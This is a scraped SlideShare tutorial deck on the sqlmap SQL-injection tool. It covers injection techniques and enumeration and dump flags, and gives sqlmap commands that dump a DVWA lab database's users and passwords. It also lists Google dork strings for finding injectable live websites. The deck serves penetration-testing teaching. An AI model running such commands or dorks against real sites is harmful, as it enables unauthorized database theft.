SlideShare a Scribd company logo

Sqlmap

Download as PPTX, PDF
Institute of Information Security (IIS)
Institute of Information Security (IIS)

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Technology
1 of 20
sqlmap
sqlmap • It is a open source tool to use sql injection in better and simpler way. • sqlmap Developed in python • sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. • It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Sqlmap developed by Bernardo Damele A. G. (@inquisb) Miroslav Stampar (@stamparm) https://twitter.com/inquisb https://twitter.com/stamparm
Features of sqlmap •It support various type of database like •MySQL •Oracle •PostgreSQL •Microsoft SQL Server •Microsoft Access • IBM DB2 • SQLite • Firebird •Sybase •SAP MaxDB •HSQLDB • Informix database management systems.
Features of sqlmap •SQL injection techniques: 1.boolean-based blind Based on page changes, data is inferred, char by char 2.time-based blind Based on time, data is inferred,char by char 3.error-based Uses the errors that are displayed to extract data 4.UNION query Changes the SQL queries to extract data 5.stacked queries Semi-colon are used to inject multiple statements on the SQL query 6.out-of-band the injection is made to a web application and a secondary channel such as DNS queries is used to dump the data back to the attacker domain. •Enumerate users, password hashes, privileges, roles, databases, tables and columns. • cracking password using a dictionary-based attack.
Features of sqlmap •Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command. •Support to dump database tables entirely. •Support to dump database tables entirely. •Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. •Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name
Detection  These options can be used to customize the detection phase  --level=LEVEL Level of tests to perform (1-5, default 1)  --risk=RISK Risk of tests to perform (1-3, default 1)  --string=STRING String to match when query is evaluated to True  --not-string=NOT.. String to match when query is evaluated to False  --regexp=REGEXP Regexp to match when query is evaluated to True  --code=CODE HTTP code to match when query is evaluated to True  --text-only Compare pages based only on the textual content  --titles Compare pages based only on their titles
Extracting Information With Sqlmap RECOVER SESSION USER USING SQLMAP. --current-user DETECT CURRENT DATABASE USING SQLMAP. --current-db FIND OUT IF SESSION USER IS DATABASE ADMINISTRATOR USING SQLMAP. --is-dba LIST DATABASE SYSTEM USERS USING SQLMAP. --users LIST DATABASES USING SQLMAP. --dbs DBMS SERVER HOSTNAME. --hostname DBMS EXACT VERSION, OS INFORMATION, ARCHITECTURE AND PATCH LEVEL. -f
Extracting Information With Sqlmap LIST THE DBMS USERS. --users LIST ALL DBMS USERS, PASSWORD HASHES --passwords LIST USERS PRIVILEGES. --privileges LIST ALL COLUMNS or JUST FOR A SPECIFIC TABLE FROM DATABASE --columns (-T <table name> -D <database>) EXECUTING A CUSTOM SQL QUERY. --sql-query=“<sql query to execute>” SQL SHELL TO EXECUTE ALL YOUR CUSTOM SQL QUERIES --sql-shell
Extracting Information With Sqlmap DBMS database to enumerate -D (Database_name) DBMS database table(s) to enumerate -T (table_name) DBMS database table column(s) to enumerate -C (columns_name) Dump DBMS database table entries --dump Dump all DBMS databases tables entries --dump-all Enumerate DBMS database tables --tables Enumerate DBMS users roles --roles
Extracting Information With Sqlmap Retrieve DBMS banner -b, --banner Enumerate DBMS schema --schema Retrieve DBMS comments --comments
Sqlmap : workflow •Find a vulnerable website • Google Dorks strings to find Vulnerable SQLMAP SQL injectable website •inurl:product-item.php?id= •inurl:news.php?catid= •inurl:index.php?id= •inurl:title.php?id= •Identify possible injections points •Identify SQLI vulnerabilities: •By using sqlmap •Manual testing •Exploit SQLi vulnerabilities
Requirement Kali linux Metasploitable 2 (testing)
Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie= ”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” --dbs DBMS databases using SQLMAP SQL Injection
DBMS databases using SQLMAP SQL Injection
List tables of target database using SQLMAP SQL Injection Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie= ”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” –D dvwa --tables
List columns on target table of selected database using SQLMAP SQL Injection Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie= ”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” –D dvwa -T users --columns
List user and password from target columns of target table of selected database using SQLMAP SQL Injection Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie= ”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” –D dvwa -T users –C user,user_id,password --dump
http://www.sqlinjection.net/sqlmap/tutorial/ References http://niiconsulting.com/checkmate/2014/01/from-sql-injection-to-0wnage-using-sqlmap/ https://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/ http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson7/index.ht ml https://github.com/sqlmapproject/sqlmap/wiki/Usage
Thank you

Recommended

Sqlmap
SqlmapSqlmap
SqlmapRushikesh Kulkarni
 
Sqlmap
SqlmapSqlmap
Sqlmapshamshad9
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 

Recommended

Sqlmap
SqlmapSqlmap
SqlmapRushikesh Kulkarni
 
Sqlmap
SqlmapSqlmap
Sqlmapshamshad9
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Sqlmap
SqlmapSqlmap
SqlmapSiddharthWagh7
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecuritySanad Bhowmik
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
SQL injection
SQL injectionSQL injection
SQL injectionRaj Parmar
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Sql Injection 0wning Enterprise
Sql Injection 0wning EnterpriseSql Injection 0wning Enterprise
Sql Injection 0wning Enterprisen|u - The Open Security Community
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Xss attack
Xss attackXss attack
Xss attackManjushree Mashal
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Frameworkn|u - The Open Security Community
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
Vapt( vulnerabilty and penetration testing ) services
Vapt( vulnerabilty and penetration testing ) servicesVapt( vulnerabilty and penetration testing ) services
Vapt( vulnerabilty and penetration testing ) servicesAkshay Kurhade
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
My sql technical reference manual
My sql technical reference manualMy sql technical reference manual
My sql technical reference manualMir Majid
 
IR SQLite Session #1
IR SQLite Session #1IR SQLite Session #1
IR SQLite Session #1InfoRepos Technologies
 

More Related Content

What's hot

Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecuritySanad Bhowmik
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
Vapt( vulnerabilty and penetration testing ) services
Vapt( vulnerabilty and penetration testing ) servicesVapt( vulnerabilty and penetration testing ) services
Vapt( vulnerabilty and penetration testing ) servicesAkshay Kurhade
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 

What's hot (20)

Sqlmap
SqlmapSqlmap
Sqlmap
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecurity
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
SQL injection
SQL injectionSQL injection
SQL injection
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection 0wning Enterprise
Sql Injection 0wning EnterpriseSql Injection 0wning Enterprise
Sql Injection 0wning Enterprise
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Xss attack
Xss attackXss attack
Xss attack
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmap
 
Vapt( vulnerabilty and penetration testing ) services
Vapt( vulnerabilty and penetration testing ) servicesVapt( vulnerabilty and penetration testing ) services
Vapt( vulnerabilty and penetration testing ) services
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 

Similar to Sqlmap

My sql technical reference manual
My sql technical reference manualMy sql technical reference manual
My sql technical reference manualMir Majid
 
Python Utilities for Managing MySQL Databases
Python Utilities for Managing MySQL DatabasesPython Utilities for Managing MySQL Databases
Python Utilities for Managing MySQL DatabasesMats Kindahl
 
The Pushdown of Everything by Stephan Kessler and Santiago Mola
The Pushdown of Everything by Stephan Kessler and Santiago MolaThe Pushdown of Everything by Stephan Kessler and Santiago Mola
The Pushdown of Everything by Stephan Kessler and Santiago MolaSpark Summit
 
Access Data from XPages with the Relational Controls
Access Data from XPages with the Relational ControlsAccess Data from XPages with the Relational Controls
Access Data from XPages with the Relational ControlsTeamstudio
 
xjtrutdctrd5454drxxresersestryugyufy6rythgfytfyt
xjtrutdctrd5454drxxresersestryugyufy6rythgfytfytxjtrutdctrd5454drxxresersestryugyufy6rythgfytfyt
xjtrutdctrd5454drxxresersestryugyufy6rythgfytfytWrushabhShirsat3
 
Tutorial On Database Management System
Tutorial On Database Management SystemTutorial On Database Management System
Tutorial On Database Management Systempsathishcs
 
SQL-Server Database.pdf
SQL-Server Database.pdfSQL-Server Database.pdf
SQL-Server Database.pdfShehryarSH1
 
Sqlite
SqliteSqlite
SqliteKumar
 
U-SQL - Azure Data Lake Analytics for Developers
U-SQL - Azure Data Lake Analytics for DevelopersU-SQL - Azure Data Lake Analytics for Developers
U-SQL - Azure Data Lake Analytics for DevelopersMichael Rys
 
Postgresql Database Administration- Day3
Postgresql Database Administration- Day3Postgresql Database Administration- Day3
Postgresql Database Administration- Day3PoguttuezhiniVP
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish fileyukta888
 

Similar to Sqlmap (20)

My sql technical reference manual
My sql technical reference manualMy sql technical reference manual
My sql technical reference manual
 
IR SQLite Session #1
IR SQLite Session #1IR SQLite Session #1
IR SQLite Session #1
 
MYSQL - PHP Database Connectivity
MYSQL - PHP Database ConnectivityMYSQL - PHP Database Connectivity
MYSQL - PHP Database Connectivity
 
Python Utilities for Managing MySQL Databases
Python Utilities for Managing MySQL DatabasesPython Utilities for Managing MySQL Databases
Python Utilities for Managing MySQL Databases
 
The Pushdown of Everything by Stephan Kessler and Santiago Mola
The Pushdown of Everything by Stephan Kessler and Santiago MolaThe Pushdown of Everything by Stephan Kessler and Santiago Mola
The Pushdown of Everything by Stephan Kessler and Santiago Mola
 
Access Data from XPages with the Relational Controls
Access Data from XPages with the Relational ControlsAccess Data from XPages with the Relational Controls
Access Data from XPages with the Relational Controls
 
Mysqlppt
MysqlpptMysqlppt
Mysqlppt
 
unit-ii.pptx
unit-ii.pptxunit-ii.pptx
unit-ii.pptx
 
xjtrutdctrd5454drxxresersestryugyufy6rythgfytfyt
xjtrutdctrd5454drxxresersestryugyufy6rythgfytfytxjtrutdctrd5454drxxresersestryugyufy6rythgfytfyt
xjtrutdctrd5454drxxresersestryugyufy6rythgfytfyt
 
Mysqlppt
MysqlpptMysqlppt
Mysqlppt
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Tutorial On Database Management System
Tutorial On Database Management SystemTutorial On Database Management System
Tutorial On Database Management System
 
SQL-Server Database.pdf
SQL-Server Database.pdfSQL-Server Database.pdf
SQL-Server Database.pdf
 
Sqlite
SqliteSqlite
Sqlite
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
U-SQL - Azure Data Lake Analytics for Developers
U-SQL - Azure Data Lake Analytics for DevelopersU-SQL - Azure Data Lake Analytics for Developers
U-SQL - Azure Data Lake Analytics for Developers
 
Postgresql Database Administration- Day3
Postgresql Database Administration- Day3Postgresql Database Administration- Day3
Postgresql Database Administration- Day3
 
Perl Programming - 04 Programming Database
Perl Programming - 04 Programming DatabasePerl Programming - 04 Programming Database
Perl Programming - 04 Programming Database
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish file
 

Recently uploaded

SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 

Recently uploaded (20)

SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 

Sqlmap

  • 2. sqlmap • It is a open source tool to use sql injection in better and simpler way. • sqlmap Developed in python • sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. • It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
  • 3. Sqlmap developed by Bernardo Damele A. G. (@inquisb) Miroslav Stampar (@stamparm) https://twitter.com/inquisb https://twitter.com/stamparm
  • 4. Features of sqlmap •It support various type of database like •MySQL •Oracle •PostgreSQL •Microsoft SQL Server •Microsoft Access • IBM DB2 • SQLite • Firebird •Sybase •SAP MaxDB •HSQLDB • Informix database management systems.
  • 5. Features of sqlmap •SQL injection techniques: 1.boolean-based blind Based on page changes, data is inferred, char by char 2.time-based blind Based on time, data is inferred,char by char 3.error-based Uses the errors that are displayed to extract data 4.UNION query Changes the SQL queries to extract data 5.stacked queries Semi-colon are used to inject multiple statements on the SQL query 6.out-of-band the injection is made to a web application and a secondary channel such as DNS queries is used to dump the data back to the attacker domain. •Enumerate users, password hashes, privileges, roles, databases, tables and columns. • cracking password using a dictionary-based attack.
  • 6. Features of sqlmap •Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command. •Support to dump database tables entirely. •Support to dump database tables entirely. •Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. •Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name
  • 7. Detection  These options can be used to customize the detection phase  --level=LEVEL Level of tests to perform (1-5, default 1)  --risk=RISK Risk of tests to perform (1-3, default 1)  --string=STRING String to match when query is evaluated to True  --not-string=NOT.. String to match when query is evaluated to False  --regexp=REGEXP Regexp to match when query is evaluated to True  --code=CODE HTTP code to match when query is evaluated to True  --text-only Compare pages based only on the textual content  --titles Compare pages based only on their titles
  • 8. Extracting Information With Sqlmap RECOVER SESSION USER USING SQLMAP. --current-user DETECT CURRENT DATABASE USING SQLMAP. --current-db FIND OUT IF SESSION USER IS DATABASE ADMINISTRATOR USING SQLMAP. --is-dba LIST DATABASE SYSTEM USERS USING SQLMAP. --users LIST DATABASES USING SQLMAP. --dbs DBMS SERVER HOSTNAME. --hostname DBMS EXACT VERSION, OS INFORMATION, ARCHITECTURE AND PATCH LEVEL. -f
  • 9. Extracting Information With Sqlmap LIST THE DBMS USERS. --users LIST ALL DBMS USERS, PASSWORD HASHES --passwords LIST USERS PRIVILEGES. --privileges LIST ALL COLUMNS or JUST FOR A SPECIFIC TABLE FROM DATABASE --columns (-T <table name> -D <database>) EXECUTING A CUSTOM SQL QUERY. --sql-query=“<sql query to execute>” SQL SHELL TO EXECUTE ALL YOUR CUSTOM SQL QUERIES --sql-shell
  • 10. Extracting Information With Sqlmap DBMS database to enumerate -D (Database_name) DBMS database table(s) to enumerate -T (table_name) DBMS database table column(s) to enumerate -C (columns_name) Dump DBMS database table entries --dump Dump all DBMS databases tables entries --dump-all Enumerate DBMS database tables --tables Enumerate DBMS users roles --roles
  • 11. Extracting Information With Sqlmap Retrieve DBMS banner -b, --banner Enumerate DBMS schema --schema Retrieve DBMS comments --comments
  • 12. Sqlmap : workflow •Find a vulnerable website • Google Dorks strings to find Vulnerable SQLMAP SQL injectable website •inurl:product-item.php?id= •inurl:news.php?catid= •inurl:index.php?id= •inurl:title.php?id= •Identify possible injections points •Identify SQLI vulnerabilities: •By using sqlmap •Manual testing •Exploit SQLi vulnerabilities
  • 14. Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie= ”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” --dbs DBMS databases using SQLMAP SQL Injection
  • 15. DBMS databases using SQLMAP SQL Injection
  • 16. List tables of target database using SQLMAP SQL Injection Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie= ”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” –D dvwa --tables
